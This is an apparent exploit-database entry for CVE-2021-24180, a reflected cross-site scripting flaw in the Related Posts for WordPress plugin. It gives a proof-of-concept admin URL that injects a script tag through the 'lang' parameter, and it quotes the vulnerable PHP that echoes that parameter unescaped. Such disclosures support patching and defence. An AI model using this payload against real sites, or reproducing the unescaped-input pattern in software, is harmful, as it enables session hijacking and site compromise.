Exploit for Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS) CVE-2021-24180

Name: Exploit for Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS) CVE-2021-24180
Rating: 5 (265 reviews)

2021-03-15 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:7593D5C8-CBC2-4469-B36B-5D4FB6D49718
/wp-admin/post.php?post=1&action=edit&lang='><script>alert(/XSS/)</script>

Root causes: classes/meta-boxes/class-meta-box-manage.php:69

if ( isset( $_GET['lang'] ) ) {
  $url .= "&amp;lang=" . $_GET['lang'];
}

echo "<span id='view-post-btn'>";
echo "<a href='" . $url . "' class='button button-primary'>";
_e( 'Add Related Posts', 'related-posts-for-wp' );